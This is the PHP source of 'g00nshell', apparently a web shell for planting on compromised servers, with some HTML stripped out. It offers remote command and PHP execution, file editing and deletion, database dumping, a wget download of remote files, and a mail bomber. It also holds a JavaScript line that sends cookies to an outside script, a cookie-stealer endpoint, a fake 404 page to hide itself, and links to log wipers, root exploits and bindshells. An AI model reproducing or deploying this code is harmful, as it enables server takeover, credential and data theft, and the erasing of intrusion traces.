document.location.href= #
#'http://site.com/shl.php?cookie='+document.cookies #
##########################VERIFICATION LEVELS#########################
#0: No protection; anyone can access #
#1: User-Agent required #
#2: Require IP #
#3: Basic Authentication #
##############################KNOWN BUGS##############################
#Windows directory handling #
# #
#The SQL tool is NOT complete. There is currently no editing function#
#available. Some time in the future this may be fixed, but for now #
#don't complain to me about it #
################################SHOUTS################################
#pr0be - Beta testing & CSS #
#TrinTiTTY - Beta testing #
#clorox - Beta testing #
#Everyone else at g00ns.net #
########################NOTE TO ADMINISTRATORS########################
#If this script has been found on your server without your approval, #
#it would probably be wise to delete it and check your logs. #
######################################################################
*/
// Configuration
$auth = 0;
$uakey = "b5c3d0b28619de70bf5588505f4061f2"; // MD5 encoded user-agent
$IP = array("127.0.0.2","127.0.0.1"); // IP Addresses allowed to access shell
$email = ""; // E-mail address where cookies will be sent
$user = "af1035a85447f5aa9d21570d884b723a"; // MD5 encoded User
$pass = "47e331d2b8d07465515c50cb0fad1e5a"; // MD5 encoded Password
// Global Variables
$version = "1.3 final";
$self = $_SERVER['PHP_SELF'];
$soft = $_SERVER["SERVER_SOFTWARE"];
$servinf = split("[:]", getenv('HTTP_HOST'));
$servip = $servinf[0];
$servport = $servinf[1];
$uname = php_uname();
$curuser = @exec('whoami');
$cmd = $_GET['cmd'];
$act = $_GET['act'];
$cmd = $_GET['cmd'];
$cookie = $_GET['cookie'];
$f = $_GET['f'];
$curdir = cleandir(getcwd());
if(!$dir){$dir = $_GET['dir'];}
elseif($dir && $_SESSION['dir']){$dir = $_SESSION['dir'];}
elseif($dir && $_SESSION['dir']){$dir = $curdir;}
if($dir && $dir != "nullz"){$dir = cleandir($dir);}
$contents = $_POST['contents'];
$gf = $_POST['gf'];
$img = $_GET['img'];
session_start();
@set_time_limit(5);
switch($auth){ // Authentication switcher
case 0: break;
case 1: if(md5($_SERVER['HTTP_USER_AGENT']) != $uakey){hide();} break;
case 2: if(!in_array($_SERVER['REMOTE_ADDR'],$IP)){hide();} break;
case 3: if(!$_SERVER["PHP_AUTH_USER"]){userauth();} break;
}
function userauth(){ // Basic authentication function
global $user, $pass;
header("WWW-Authenticate: Basic realm='Secure Area'");
if(md5($_SERVER["PHP_AUTH_USER"]) != $user || md5($_SERVER["PHP_AUTH_PW"] != $pass)){
hide();
die();
}
}
if(!$act && !$cmd && !$cookie && !$f && !$dir && !$gf && !$img){main();}
elseif(!$act && $cmd){
style();
echo("Results:\n
");
}
elseif($cookie){@mail("$email", "Cookie Data", "$cookie", "From: $email"); hide();} // Cookie stealer function
elseif($act == "view" && $f && $dir){view($f, $dir);}
elseif($img){img($img);}
elseif($gf){grab($gf);}
elseif($dir){files($dir);}
else{
switch($act){
case "phpinfo": phpinfo();break;
case "sql": sql();break;
case "files": files($dir);break;
case "email": email();break;
case "cmd": cmd();break;
case "upload": upload();break;
case "tools": tools();break;
case "sqllogin": sqllogin();break;
case "sql": sql();break;
case "lookup": lookup();break;
case "kill": kill();break;
case "phpexec": execphp();break;
default: main();break;
}
}
function cleandir($d){ // Function to clean up the $dir and $curdir variables
$d = realpath($d);
$d = str_replace("\\\\", "//", $d);
$d = str_replace("////", "//", $d);
$d = str_replace("\\", "/", $d);
return($d);
}
function hide(){ // Hiding function
global $self, $soft, $servip, $servport;
die("
404 Not Found
Not Found
The requested URL $self was not found on this server.
Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.
$soft Server at $servip Port $servport
");
}
function style(){ // Style / header function
global $servip,$version;
echo("\n
\n
g00nshell v" . $version . " - " . $servip . "\n
\n
\n");
}
function main(){ // Main/menu function
global $self, $servip, $servport, $uname, $soft, $banner, $curuser, $version;
style();
$act = array('cmd'=>'Command Execute','files'=>'File View','phpinfo'=>'PHP info', 'phpexec'=>'PHP Execute',
'tools'=>'Tools','sqllogin'=>'SQL','email'=>'Email','upload'=>'Get Files','lookup'=>'List Domains','bshell'=>'Bindshell','kill'=>'Kill Shell');
$capt = array_flip($act);
echo("\n");
if($_POST['cmd'] != ""){$x = $_POST['cmd'];}
elseif($_POST['precmd'] != ""){$x = $_POST['precmd'];}
else{die();}
echo("Results:
");
}
function execphp(){ // PHP code execution function
style();
echo("Execute PHP Code
");
echo("");
if($_POST['phpexec']){
echo("");
}
}
function sqllogin(){ // MySQL login function
session_start();
if($_SESSION['isloggedin'] == "true"){
header("Location: ?act=sql");
}
style();
echo("");
die();
}
function sql(){ // General SQL Function
session_start();
if(!$_GET['sqlf']){style();}
if($_POST['un'] && $_POST['pw']){;
$_SESSION['sql_user'] = $_POST['un'];
$_SESSION['sql_password'] = $_POST['pw'];
}
if($_POST['host']){$_SESSION['sql_host'] = $_POST['host'];}
else{$_SESSION['sql_host'] = 'localhost';}
if($_POST['port']){$_SESSION['sql_port'] = $_POST['port'];}
else{$_SESSION['sql_port'] = '3306';}
if($_SESSION['sql_user'] && $_SESSION['sql_password']){
if(!($sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_port'], $_SESSION['sql_user'], $_SESSION['sql_password']))){
unset($_SESSION['sql_user'], $_SESSION['sql_password'], $_SESSION['sql_host'], $_SESSION['sql_port']);
echo("Invalid credentials
\n");
die(sqllogin());
}
else{
$_SESSION['isloggedin'] = "true";
}
}
else{
die(sqllogin());
}
if ($_GET['db']){
mysql_select_db($_GET['db'], $sqlcon);
if($_GET['sqlquery']){
$dat = mysql_query($_GET['sqlquery'], $sqlcon) or die(mysql_error());
$num = mysql_num_rows($dat);
for($i=0;$i<$num;$i++){
echo(mysql_result($dat, $i) . "
\n");
}
}
else if($_GET['table'] && !$_GET['sqlf']){
echo("Insert Row
\n");
echo("");
$query = "SHOW COLUMNS FROM " . $_GET['table'];
$result = mysql_query($query, $sqlcon) or die(mysql_error());
$i = 0;
$fields = array();
while($row = mysql_fetch_assoc($result)){
array_push($fields, $row['Field']);
echo("" . $fields[$i]);
$i++;
}
$result = mysql_query("Select * FROM " . $_GET['table'], $sqlcon) or die(mysql_error());
$num_rows = mysql_num_rows($result) or die(mysql_error());
$y=0;
for($x=1;$x<=$num_rows+1;$x++){
if(!$_GET['p']){
$_GET['p'] = 1;
}
if($_GET['p']){
if($y > (30*($_GET['p']-1)) && $y <= 30*($_GET['p'])){
echo(" | ");
for($i=0;$i" . $row[0] . "");
}
}
echo("
\n");
}
}
$y++;
}
echo("
\n");
for($z=1;$z<=ceil($num_rows / 30);$z++){
echo("" . $z . " | ");
}
}
elseif($_GET['table'] && $_GET['sqlf']){
switch($_GET['sqlf']){
case "dl": sqldownload();break;
case "ins": sqlinsert();break;
default: $_GET['sqlf'] = "";
}
}
else{
echo("");
$query = "SHOW TABLES FROM " . $_GET['db'];
$dat = mysql_query($query, $sqlcon) or die(mysql_error());
while ($row = mysql_fetch_row($dat)){
echo("" . $row[0] . " | [Download] |
\n");
}
echo("
");
}
}
else{
$dbs=mysql_list_dbs($sqlcon);
while($row = mysql_fetch_object($dbs)) {
echo("" . $row->Database . "
\n");
}
}
mysql_close($sqlcon);
}
function sqldownload(){ // Download sql file function
@ob_flush;
$sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_port'], $_SESSION['sql_user'], $_SESSION['sql_password']);
mysql_select_db($_GET['db'], $sqlcon);
$query = "SHOW COLUMNS FROM " . $_GET['table'];
$result = mysql_query($query, $sqlcon) or die(mysql_error());
$fields = array();
while($row = mysql_fetch_assoc($result)){
array_push($fields, $row['Field']);
$i++;
}
$result = mysql_query("Select * FROM " . $_GET['table'], $sqlcon) or die(mysql_error());
$num_rows = mysql_num_rows($result) or die(mysql_error());
for($x=1;$x<$num_rows;$x++){
$out .= "(";
for($i=0;$i\nGo back");
}
$query = "SHOW COLUMNS FROM " . $_GET['table'];
$result = mysql_query($query, $sqlcon) or die(mysql_error());
$i = 0;
$fields = array();
echo("");
}
function nicesize($size){
if(!$size){return false;}
if ($size >= 1073741824){return(round($size / 1073741824) . " GB");}
elseif ($size >= 1048576){return(round($size / 1048576) . " MB");}
elseif ($size >= 1024){return(round($size / 1024) . " KB");}
else{return($size . " B");}
}
function files($dir){ // File manipulator function
style();
global $self, $curdir;
if($dir==""){$dir = $curdir;}
$dirx = explode("/", $dir);
$files = array();
$folders = array();
echo("");
echo("File list for ");
for($i=0;$i$dirx[$i]" . "/");
}
echo("
");
echo("");
echo("File Name | File Size | ");
if ($handle = opendir($dir)) {
while (false != ($link = readdir($handle))) {
if (is_dir($dir . '/' . $link)){
$file = array();
if(is_writable($dir . '/' . $link)){$file['perm']='write';}
elseif(is_readable($dir . '/' . $link)){$file['perm']='read';}
else{$file['perm']='none';}
switch($file['perm']){
case "write": @$file['link'] = "$link"; break;
case "read": @$file['link'] = "$link"; break;
case "none": @$file['link'] = "$link"; break;
default: @$file['link'] = "$link"; break;
}
@$file['icon'] = "folder";
if($_SERVER['QUERY_STRING']){$folder = " " . $file['link'];}
else{$folder = " " . $file['link'];}
array_push($folders, $folder);
}
else{
$file = array();
$ext = strtolower(end(explode(".", $link)));
if(!$file['size'] = nicesize(@filesize($dir . '/' . $link))){
$file['size'] = "0B";
}
if(is_writable($dir . '/' . $link)){$file['perm']='write';}
elseif(is_readable($dir . '/' . $link)){$file['perm']='read';}
else{$file['perm']='none';}
switch($file['perm']){
case "write": @$file['link'] = "$link"; break;
case "read": @$file['link'] = "$link"; break;
case "none": @$file['link'] = "$link"; break;
default: @$file['link'] = "$link"; break;
}
switch($ext){
case "exe": case "com": case "jar": case "": $file['icon']="binary"; break;
case "jpg": case "gif": case "png": case "bmp": $file['icon']="image"; break;
case "zip": case "tar": case "rar": case "gz": case "cab": case "bz2": case "gzip": $file['icon']="compressed"; break;
case "txt": case "doc": case "pdf": case "htm": case "html": case "rtf": $file['icon']="text"; break;
case "wav": case "mp3": case "mp4": case "wma": $file['icon']="sound"; break;
case "js": case "vbs": case "c": case "h": case "sh": case "pl": case "py": case "php": case "h": $file['icon']="script"; break;
default: $file['icon'] = "unknown"; break;
}
if($_SERVER['QUERY_STRING']){$file = " " . $file['link'] . " | " . $file['size'] . " |
\n";}
else{$file = " " . $file['link'] . " | " . $file['size'] . " |
\n";}
array_push($files, $file);
}
}
foreach($folders as $folder){echo("$folder | DIR |
\n");}
foreach($files as $file){echo($file);}
echo("
");
closedir($handle);
}
}
function email(){ // Email bomber function
$times = $_POST['times'];
$to = $_POST['to'];
$subject = $_POST['subject'];
$body = $_POST['body'];
$from = $_POST['from'];
style();
echo("Mail Bomber
");
if ($to && $from){for($i=0;$i<$times;$i++){mail("$to", "$subject", "$body", "From: $from");}}
}
function view($filename, $dir){ // File view function
if($_POST['fileact'] == "Download"){
header("Content-type: application/octet-stream");
header("Content-length: ".strlen($_POST['contents']));
header("Content-disposition: attachment; filename=" . basename($filename) . ";");
$handle = fopen($filename, "r");
echo(fread($handle, filesize($filename)));
die();
}
style();
if($_POST['contents'] && $_POST['fileact'] == "Save"){
$handle = fopen($filename, 'w');
fwrite($handle, stripslashes($_POST['contents']));
fclose($handle);
echo("Saved file.
");
echo("Go back");
die();
}
elseif($_POST['fileact'] == "Delete"){
unlink($filename);
echo("Deleted file.
");
echo("Go back");
die();
}
if($dir != "nullz"){ // heh
$filename = $dir."/".$filename;
}
$bad = array("<", ">");
$good = array("<", ">");
$file = fopen($filename, 'r');
$content = fread($file, @filesize($filename));
echo("");
}
function edit($file, $contents){ // File edit function
style();
$handle = fopen($file, 'w');
fwrite($handle, $contents);
fclose($handle);
echo("Saved file.
");
echo("Go back");
}
function upload(){ // Uploading frontend function
global $curdir;
style();
echo("
");
if($_POST['rem']){grab($_POST['rem']);}
if($_FILES['up']){up($_FILES['up']);}
}
function up($up){ // Uploading backend function
style();
$updir = $_POST['loc'];
move_uploaded_file($up["tmp_name"], $updir . "/" . $up["name"]);
die("File has been uploaded.");
}
function grab($file){ // Uploading backend function
style();
$updir = $_POST['loc'];
$filex = array_pop(explode("/", $file));
if(exec("wget $file -b -O $updir/$filex")){die("File has been uploaded.");}
else{die("File upload failed.");}
}
function tools(){ // Useful tools function
global $curdir;
style();
$tools = array(
"--- Log wipers ---"=>"1",
"Vanish2.tgz"=>"http://packetstormsecurity.org/UNIX/penetration/log-wipers/vanish2.tgz",
"Cloak.c"=>"http://packetstormsecurity.org/UNIX/penetration/log-wipers/cloak.c",
"gh0st.sh"=>"http://packetstormsecurity.org/UNIX/penetration/log-wipers/gh0st.sh",
"--- Priv Escalation ---"=>"2",
"h00lyshit - Linux 2.6 ALL"=>"http://someshit.net/files/xpl/h00lyshit",
"k-rad3 - Linux <= 2.6.11"=>"http://someshit.net/files/xpl/krad3",
"raptor - Linux <= 2.6.17.4"=>"http://someshit.net/files/xpl/raptor",
"rootbsd - BSD v?"=>"http://someshit.net/files/xpl/rootbsd",
"--- Bindshells ---"=>"3",
"THC rwwwshell-1.6.perl"=>"http://packetstormsecurity.org/groups/thc/rwwwshell-1.6.perl",
"Basic Perl bindshell"=>"http://packetstormsecurity.org/groups/synnergy/bindshell-unix",
"--- Misc ---"=>"4",
"MOCKS SOCKS4 Proxy"=>"http://superb-east.dl.sourceforge.net/sourceforge/mocks/mocks-0.0.2.tar.gz",
"xps.c (proc hider)"=>"http://packetstormsecurity.org/groups/shadowpenguin/unix-tools/xps.c");
$names = array_flip($tools);
echo("Tools:");
echo("");
}
function lookup(){ // Domain lookup function
style();
global $servinf;
$script = "import urllib, urllib2, sys, re
req = urllib2.Request('http://www.seologs.com/ip-domains.html', urllib.urlencode({'domainname' : sys.argv[1]}))
site = re.findall('.+\) (.+)
', urllib2.urlopen(req).read())
for i in xrange(0,len(site)):
print site[i]"; // My sexy python script
$handle = fopen('lookup.py', 'w');
fwrite($handle, $script);
fclose($handle);
echo("Domains
");
echo("